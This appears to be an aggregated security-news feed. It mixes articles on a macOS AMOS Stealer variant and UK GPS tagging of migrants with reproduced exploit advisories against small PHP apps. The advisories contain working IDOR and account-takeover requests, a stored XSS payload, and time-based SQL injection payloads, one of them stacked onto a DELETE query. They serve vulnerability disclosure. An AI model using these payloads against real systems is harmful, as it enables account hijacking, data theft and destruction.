By Waqas
macOS users watch out for the new variant aiming at your crypto funds!
This is a post from HackRead.com Read the original post: New Variant of AMOS Stealer Targets Safari Cookies and Crypto Wallets

The new Atomic variant uses Python and Apple Script code to target browser and system files, obtain user account passwords, and identify sandbox or emulator execution.

Bitdefender researchers have discovered a new variant of the AMOS Stealer (or Atomic Stealer), one of the most prevalent threats for macOS users in the last year. According to Bitdefender, the new variant was discovered while revisiting old or new malware samples to improve detection capabilities for macOS cyber-security products.

When researchers isolated several suspicious macOS disk image files, which were surprisingly small for their size (1.3 MB), they became suspicious of the emergence of a new variant of the AMOS Stealer.

Screenshot from VirusTotal (Bitdefender)

The new variant combines functionalities of numerous malware families, including information stealers, keyloggers, and cryptocurrency mining tools, allowing it to steal sensitive data while its advanced stealth makes it harder for users to identify/remove the infection.

Further probing revealed that this variant shares similarities with the second variant of RustDoor. “Both seem to focus on collecting sensitive files from the victim’s computer, with the current one being a more developed version of the script used by RustDoor,” researchers noted.

However, the new variant has additional features. It collects the Cookies.binarycookies file, which stores Safari browser cookies, obtains files with targeted extensions from specific locations and uses the system\_profiler utility to gather information about the compromised computer. 

The attackers aim to obtain hardware-related details, operating system versions and connected displays and graphic cards. They add sensitive information to the archive, including passwords, encryption keys, and certificates, indicating their growing interest in cryptocurrency platforms.

This version has an unusual technique of combining Python with Apple Scripting where the filegrabber() function executes a large block of Apple script using the osascript -e command. DMG files contain FAT binary and Mach-O files for Intel and ARM architectures, used by threat actors to steal data.

When opened, as noted by researchers in a blog post, the Crack Installer application prompts the user to open the file. The Python script collects sensitive data from multiple sources, including crypto-wallet extensions, browser data, and user account passwords.

The Chromium () function collects files from targeted Chromium-based browsers, including web data, login data, and cookies. It also targets cryptocurrency browser extensions and Mach-O binaries. The parseFF() function targets Firefox and collects files associated with all profiles.

Moreover, the script targets installed crypto wallets like Electrum, Coinomi, Exodus or Atomic. The collected data is stored in a ZIP archive, which is sent to a C2 server using a POST request. The archive structure is confirmed by the C2 server.

The variant is largely undetected at the moment. Bitdefender has released Indicators of Compromise to help organizations and practitioners detect and mitigate this threat.

1.  **BlueNoroff APT Targeting macOS with ObjCShellz Malware**
2.  **Lazarus Group uses KandyKorn macOS malware for crypto theft**
3.  **Cracked macOS Software Laced with New Trojan Proxy Malware**
4.  **New macOS Backdoor Steals Data, Linked to Ransomware Gangs**
5.  **New Malware Turns Windows and macOS Devices into Proxy Nodes**

New Variant of AMOS Stealer Targets Safari Cookies and Crypto Wallets

Ankle tags that constantly log a person’s coordinates are part of a growing cadre of experimental surveillance tools that countries around the world are trying out on new arrivals.

Mark Nelson took the call in an immigration detention center—a place that, to him, felt just like prison. It had the same prison windows, the same tiny box rooms. By the time the phone rang, he’d already spent 10 days detained there, and he was wracked with worry that he would be forced onto a plane without the chance to say goodbye to his kids. So when his lawyers relayed the two options available under UK law—either stay in detention indefinitely or go home wearing a tracking device—it didn’t exactly feel like a choice. “That’s being coerced,” says Nelson, who moved from Jamaica to the UK more than 20 years ago. He felt desperate to get out of there and go home to his family—even if a GPS tag had to come too.

It was May 2022 when the contractors arrived at Colnbrook Detention Center, on the edge of London’s Heathrow Airport, to fit the device. Nelson knew the men were with the government’s Electronic Monitoring Service, but he didn’t know their names or the company they worked for. Still, he followed them to a small room, where they measured his leg and locked the device around his ankle. Since then, for almost two years, Nelson has been accompanied by the tag wherever he goes. Whether he is watching TV, taking his kids to school, or in the shower, his tag is continuously logging his coordinates and sending them back to the company that operates the tag on behalf of the British government.

Nelson lifts up his trousers to reveal the tag, wrapped around his leg, like a giant gray leech. He chokes down tears as he describes the impact the device has had on his life. “It’s depressing,” he says, being under constant surveillance. “Right through this process, it’s like I’m not a human anymore.”

In England and Wales, since 2019, people convicted of knife crime or other violent offenses have been ordered to wear GPS ankle tags upon their release from prison. But requiring anyone facing a deportation order to wear a GPS tag is a more recent and more controversial policy, introduced in 2021. Nelson wears a tag because his right to remain in the UK was revoked following his conviction for growing cannabis in 2017—a crime for which he served two years of a four-year sentence. But migrants arriving in small boats on the coast of southern England, with no previous convictions, were also tagged during an 18-month pilot program that ended in December 2023. Between 2022 and 2023, the number of people ordered to wear GPS trackers jumped by 56 percent to more than 4,000 people, according to research by the Public Law Project, a legal nonprofit.

“Foreign nationals who abuse our hospitality by committing crimes in the UK should be in no doubt of our determination to deport them,” a Home Office spokesperson tells WIRED. “Where removal isn’t immediately possible, electronic monitoring can be used to manage foreign national offenders and selected others released on immigration bail.” The Home Office, the UK’s interior ministry, declined to answer questions on “operational details,” such as whether GPS coordinates are being tracked in real time and for how long the Home Office stores individuals’ location data. “This highly intrusive form of surveillance is being used to solve a problem that does not exist,” says Jo Hynes, a senior researcher at the Public Law Project. GPS tags are designed to prevent people facing deportation orders from going on the run. But according to Hynes, only 1.3 percent of people on immigration bail absconded in the first six months of 2022.

Now, Nelson is the first person to challenge Britain’s GPS tagging regime in a high court, arguing that the tags are a disproportionate breach of privacy. A judgment on the case is expected any day now, and critics of GPS tagging hope the decision will have ripple effects throughout the British immigration system. “A judgment in Mark’s favor could take quite a lot of different forms,” says Jonah Mendelsohn, a legal officer at data rights group Privacy International. He adds that the court could force the Home Office to stop tagging migrants altogether, or it could limit the amount of data the tags collect. “It could set a precedent.”

The GPS tags are part of an intensifying surveillance regime that migrants and refugees are now subject to in the UK, the US, and Australia, says Mendelsohn. “There is so much tech that’s being rolled out and used almost in an experimental lab-esque way,” he says, pointing to how migrants arriving in Britain on small boats have been told to hand over their phones and pin codes or fitted with bar-coded wristbands. “GPS tracking is just one aspect of that.”

Allegations that the tags are prone to malfunction also aggravate the stress people feel while wearing them, Mendelsohn says. By law, the tags can’t be removed. But they still need charging, either by being plugged into a socket or a portable battery pack. Nelson’s first tag would run out of battery every two hours, he claims, meaning he could never travel far from a plug socket—failure to charge a tag can count as a breach of immigration bail conditions, risking return to a detention center.

The battery was just one in a series of problems, Nelson claims. Between November 2022 and May 2023, he believes his tag was no longer logging his GPS coordinates, with his legal team at Wilsons Solicitors arguing this proved the tag was redundant and should be removed. But until now, the Home Office has refused to take off the tag. “\[They said\] the law is the law and I’m subject to the law,” says Nelson. “So I’ve got to wear this broken tag whether it works or not.” The company that monitors and maintains the tags on behalf of the government since 2014, Capita Business Services, did not reply to WIRED’s request to comment.

Nelson might have been the first person to challenge the GPS tagging regime in court. But others were close behind. British law firm Duncan Lewis Solicitors is representing another four people forced to wear GPS tags, ranging from EU citizens to people who arrived in the UK on small boats. “Such surveillance of vulnerable individuals is not necessary in any democratic society, and we are proud to represent these claimants in their fight against this poorly run and dystopian regime,” says Conor Lamb, who works in the public law department at Duncan Lewis.

One of the people whom Duncan Lewis is representing is a 25-year-old former asylum seeker from Sudan who arrived in the UK via a small boat and has no criminal history, according to his lawyers. The tag brought up painful memories of being bound and tortured during his journey to the UK, they argued in court. After two psychiatric reports were submitted to the government, the tag was taken off and his data deleted. Despite that, the man, who uses the pseudonym ADL, remains part of the court case in order to challenge the practice of tagging new arrivals.

Meanwhile, Nelson is still waiting for his tag to be taken off. He’s frustrated that he has to wear the tag despite already having served his time in prison. “Before all of this, I was social,” he says. Now, he says, he’s too self-conscious to go out much, in case others see the tag and mistake him for the perpetrator of a violent crime. He describes how the tag has left him feeling “up and down,” as if he has no good choices left. “In order for me to see my family and to be part of my family, I’m still being forced into 24/7 monitoring, someone watching me and watching what I do, every day.”

The UK Is GPS-Tagging Thousands of Migrants

Hospital Management System version 1.0 suffers from insecure direct object reference and account takeover vulnerabilities.

# Exploit Title: Hospital Management System - IDOR + Accaunt Takeover  
# Google Dork: N/A  
# Application: Hospital Management System  
# Date: 27.02.2024  
# Bugs: IDOR + Accaunt Takeover  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

This report focuses on two vulnerabilities known as "Insecure Direct Object References (IDOR)" and "Account Takeover". These vulnerabilities occur in a scenario where user input and access privileges validation is inadequate.

## Proof of Concept (PoC):

Target User Information:

User 1:  
ID: 1  
Email: patient@patient.com  
Password: patient  
-----------------------------------  
User 2:  
ID: 4  
Email: attack@ker  
Password: q1w2e3  
-----------------------------------

User 1 Request

POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1  
Host: localhost  
Cookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=f6je8gcsm0h685mfr2g37ot8to  
...  
id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=Mrs.Sunita+Dighe&nic=422201&Tele=9090909091&address=India&password=patient&cpassword=patient

User 2 Request

POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=4c8per12a8freilu1upich92a4  
...  
id00=4&oldemail=attack%40ker&email=attack%40ker&name=attack+attacker&nic=123123123&Tele=0712345677&address=attac&password=q1w2e3&cpassword=q1w2e3

Attacker's Request

The attacker aims to modify the account details of "patient 1" and sends the following HTTP request:

POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=4c8per12a8freilu1upich92a4  
...  
id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=MRRS.Sunita+Dighe&nic=422201&Tele=9090909091&address=attac&password=q1w2e3&cpassword=q1w2e3

In the above SQL queries, the $id value received from the user is directly included in the query and security   
checks are not performed. This allows exploiting another user's information. At the same time, since   
the user's identity is obtained from the POST data, the attacker can pass his identity as another user's identity.

PoC video: https://www.youtube.com/watch?v=pmoBSnu9IYI

## Vulnerable code section:  
====================================================

$sql1="update patient set pemail='$email',pname='$name',ppassword='$password',pnic='$nic',ptel='$tele',paddress='$address' where pid=$id ;";  
$database->query($sql1);  
echo $sql1;  
$sql1="update webuser set email='$email' where email='$oldemail' ;";  
$database->query($sql1);  
echo $sql1;  
====================================================

## Risks This security vulnerability exposes user information to unauthorized access and modifications. Consequently, there are potential risks such as account takeover, privacy breaches, and non-compliance with security policies, which can lead to substantial damage and security breaches in the system.

Hospital Management System 1.0 Insecure Direct Object Reference / Account Takeover

Hospital Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Hospital Management System - Stord XSS# Google Dork: N/A# Application: Hospital Management System# Date: 27.02.2024# Bugs: Stord XSS# Exploit Author: SoSPiro# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html# Version: 1.0# Tested on: Windows 10 64 bit Wampserver # CVE : N/A## Vulnerability Description:A security vulnerability has been identified in the "Vaidya Mitra" healthcare application, specifically in the doctor's account settings functionality. The issue arises due to inadequate input validation, allowing an attacker to inject malicious scripts into the system, leading to a Cross-Site Scripting (XSS) vulnerability.## Proof of Concept (PoC):1. Exploiting Doctor's Account Settings:The attacker, using the Burp Suite Proxy tool, intercepts and modifies a POST request sent by the doctor to update their account settings.The payload <script>alert(1)</script> is injected into the email parameter.The manipulated request looks like the following:POST /Vaidya%20Mitra/vm/doctor/edit-doc.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0...Content-Type: application/x-www-form-urlencodedContent-Length: 170...id00=2&oldemail=doctor%40doctor.com&email=doctor%40doctor.com<script>alert(1)</script>&name=Dr.Akash+Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassword=doctorUpon submission, the payload gets stored in the doctor's email field.2. Triggering XSS in Admin's View:An admin viewing doctors' information at http://localhost/Vaidya%20Mitra/vm/admin/doctors.php inadvertently triggers the XSS vulnerability.The admin sends a GET request to view a doctor's details:GET /Vaidya%20Mitra/vm/admin/doctors.php?action=view&id=2 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0...The server returns the doctor's information, and the XSS payload in the email field is executed in the admin's browser, leading to the alert being triggered.PoC - video: https://drive.google.com/file/d/1dCz5Q3mKMfpB2pjPeOV6ZoBi1Nj74DR1/view?usp=drive_link

Hospital Management System 1.0 Cross Site Scripting

Hospital Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Hospital Management System - SQL Injection# Google Dork: N/A# Application: Hospital Management System# Date: 26.02.2024# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html# Version: 1.0# Tested on: Windows 10 64 bit Wampserver # CVE : N/A## Vulnerability Description:A security vulnerability has been identified in this web application due to the direct inclusion of user-input data into SQL queries, rendering it susceptible to SQL Injection attacks. This vulnerability may enable malicious actors to gain unauthorized access to sensitive information.## Proof of Concept (PoC):Below is an example of an attack that a malicious actor could execute to exploit this vulnerability.POST /Vaidya%20Mitra/vm/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 80Origin: http://localhostConnection: closeReferer: http://localhost/Vaidya%20Mitra/vm/login.phpCookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=18a16tga7k2glh7useremail=test@123.asd'%2b(select*from(select(sleep(5)))a)%2b'&userpassword=testIn this example, the payload appended to the useremail parameter aims to execute a sleep function, intentionally delaying the server's response time. Real-world attacks could involve more malicious operations.Request - Response foto: https://i.imgur.com/LxENLBz.png## Vulnerable code section:====================================================/Vaidya%20Mitra/vm/login.php$email = $_POST['useremail'];$password = $_POST['userpassword'];$result = $database->query("select * from webuser where email='$email'");

Hospital Management System 1.0 SQL Injection

Talos has observed a phishing spam campaign targeting potential victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023.

TimbreStealer campaign targets Mexican users with financial lures

An "intricately designed" remote access trojan (RAT) called Xeno RAT has been made available on GitHub, making it available to other actors at no extra cost.
Written in C# and compatible with Windows 10 and Windows 11 operating systems, the open-source RAT comes with a "comprehensive set of features for remote system management," according to its developer, who goes by the name moom825

Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub

Starting today, we are doubling the maximum bounty award for the Microsoft 365 Insider Bug Bounty Program to $30,000 USD for high impact scenarios, such as unauthenticated non-sandboxed code execution with no user interaction. We are also expanding the scope of our bounty program to include more vulnerability types and products.

Starting today, we are doubling the maximum bounty award for the Microsoft 365 Insider Bug Bounty Program to $30,000 USD for high impact scenarios, such as unauthenticated non-sandboxed code execution with no user interaction. We are also expanding the scope of our bounty program to include more vulnerability types and products. From **Security feature bypass** and **Microsoft OneNote**, we’re partnering with researchers to cast a wider net to catch and fix high severity security vulnerabilities. Finally, we’ve introduced a tiered approach to awards for vulnerabilities that meet a certain severity and report quality.

To get started, join the Microsoft 365 Insider program.  For more information, see:

*   Microsoft 365 Insider Blog
*   Microsoft 365 Insider Handbook
*   Microsoft 365 Insider FAQ
*   Follow us @Msft365Insider

As shared in our bounty year in review blog post, we are constantly growing, iterating, and evolving our bounty programs to help Microsoft customers stay ahead of the curve in the ever-changing security landscape and emerging technologies. We are grateful for the security research community and look forward to receiving your submissions and working with you to improve security for everyone.

Found a security vulnerability? Share your findings by submitting a report through the MSRC Researcher Portal.

We are excited to learn and hear your feedback on the expanded Microsoft 365 Insider bounty program. If you have any questions about this program or any other security research incentive program, please email us at bounty@microsoft.com. 

Bruce Robinson, MSRC

Microsoft boosts its Microsoft 365 Insider Builds on Windows Bounty Program with higher awards and an expanded scope

Simple Inventory Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Simple Inventory Management System - SQL Injection  
# Google Dork: N/A  
# Application: Simple Inventory Management System  
# Date: 26.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.

## Proof of Concept (PoC):

An example attacker could input the following values:

email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'  
pwd: test

This would result in the following SQL query:

SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'

This attack would retrieve all users, making the login process always successful.

request-response foto:https://i.imgur.com/slkzYJt.png

## Vulnerable code section:  
====================================================  
ims/login.php

<?php   
ob_start();  
session_start();  
include('inc/header.php');  
$loginError = '';  
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {  
  include 'Inventory.php';  
  $inventory = new Inventory();

  // Vulnerable code  
  $login = $inventory->login($_POST['email'], $_POST['pwd']);   
  //

if(!empty($login)) {  
    $_SESSION['userid'] = $login[0]['userid'];  
    $_SESSION['name'] = $login[0]['name'];        
    header("Location:index.php");  
  } else {  
    $loginError = "Invalid email or password!";  
  }  
}  
?>

Simple Inventory Management System 1.0 SQL Injection

Flashcard Quiz App version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Flashcard Quiz App - SQL Injection# Google Dork: N/A# Application: Flashcard Quiz App# Date: 25.02.2024# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows 10 64 bit Wampserver # CVE : N/A## Vulnerability Description:The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.## Proof of Concept (PoC):This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.1. Original Code:$card = $_GET['card'];$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";2. Payload:' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --3. Injected Query:DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --Request Response foto: https://i.imgur.com/5IXvpiZ.png## Vulnerable code section:====================================================endpoint/delete-flashcard.php$card = $_GET['card'];$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";

Tag

#windows